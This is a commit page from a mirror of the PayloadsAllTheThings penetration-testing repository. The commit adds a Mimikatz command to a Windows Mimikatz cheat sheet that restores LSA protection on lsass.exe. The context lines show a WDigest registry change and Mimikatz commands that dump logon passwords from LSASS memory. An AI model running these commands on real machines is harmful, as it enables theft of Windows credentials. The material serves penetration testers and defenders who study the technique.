ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-31 07:27:25 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

add mimikatz command to protect a process again after removing the protection

Browse Source 
fe4e984055/mimikatz/modules/kuhl_m_kernel.c (L99)
This commit is contained in:
mpgn 2021-02-17 12:15:47 +01:00 committed by GitHub
parent f6f8ec010a
commit 9be371d793
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Methodology and Resources/Windows - Mimikatz.md
View File

@ -77,6 +77,9 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
# Now lets re-add the protection flags to the lsass.exe process
mimikatz # !processprotect /process:lsass.exe
```
- LSA is running as virtualized process (LSAISO) by **Credential Guard**